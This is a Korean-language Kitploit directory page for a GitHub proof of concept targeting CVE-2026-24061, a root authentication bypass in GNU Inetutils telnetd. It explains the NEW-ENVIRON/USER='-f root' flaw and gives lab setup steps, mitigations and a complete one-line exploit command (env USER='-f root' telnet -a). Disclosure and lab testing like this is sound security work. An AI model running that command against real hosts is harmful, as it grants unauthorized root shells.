Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd 원격 인증 우회 | Kitploit
도구/GitHubGitHub/midox008/cve-2026-24061
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubmidox008/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd 원격 인증 우회

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-24061

GNU Inetutils telnetd 원격 인증 우회

정말로, 2026년에 텔넷이라니? 제발, 이제 넘어갈 때입니다. SSH는 1995년부터 있었습니다. 🤦

설명

GNU Inetutils telnetd의 1.9.3부터 2.7까지의 버전에 영향을 미치는 치명적인 인증 우회 취약점입니다.

이 취약점은 NEW-ENVIRON 텔넷 옵션을 악용하여 login(1)에 악의적인 인자를 주입합니다. 텔넷 프로토콜을 통해 USER=-f root를 설정함으로써, 공격자는 인증을 우회하고 자격 증명 없이 루트 셸을 얻을 수 있습니다.

영향을 받는 버전

  • GNU Inetutils 1.9.3 - 2.7

기술적 세부 사항

텔넷 프로토콜은 클라이언트가 서버에 환경 변수를 보낼 수 있게 해주는 NEW-ENVIRON 옵션(RFC 1572)을 지원합니다. telnetd 데몬은 USER 변수를 login(1)에 인자로 전달합니다.

USER=-f root를 보내면, 값은 다음과 같이 해석됩니다:

  • -f 플래그: 인증 건너뛰기(신뢰된 호스트)
  • root: 대상 사용자

이로 인해 login -f root가 실행되어 즉시 루트 액세스 권한이 부여됩니다.

PoC는 IAC WILL ECHO(0xff 0xfb 0x01)를 확인하여 성공적인 악용을 감지합니다. 이는 서버가 셸 액세스 권한을 부여할 때 보내는 프로토콜 신호입니다.

실습 환경 구성

root@kitploit:~
# 취약한 telnetd 컨테이너 빌드 및 실행
docker compose up --build -d

# 익스플로잇 테스트
go run poc.go 127.0.0.1 2323

악용

root@kitploit:~
# Go PoC 사용 (대화형 셸 포함)
go run poc.go <target> <port>

# 표준 텔넷 클라이언트를 사용한 간단한 PoC
env USER='-f root' telnet -a <target> <port>

완화 조치

  • 2026년에 텔넷 사용을 중단하세요, 정말로 🙏
  • 대신 SSH를 사용하세요 (이제 31년이나 되었습니다, 저는 '95년에 태어나지도 않았는데 ㅋㅋ)
  • 패치된 버전의 GNU Inetutils로 업그레이드하세요
  • 방화벽 규칙으로 텔넷 액세스를 제한하세요

파일

  • poc.go - 대화형 셸이 포함된 Go 익스플로잇
  • Dockerfile - 취약한 telnetd 컨테이너
  • docker-compose.yml - 실습 환경 오케스트레이션

참고 자료

  • 권고: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

크레딧

  • LeakIX Research Team
도구 다운로드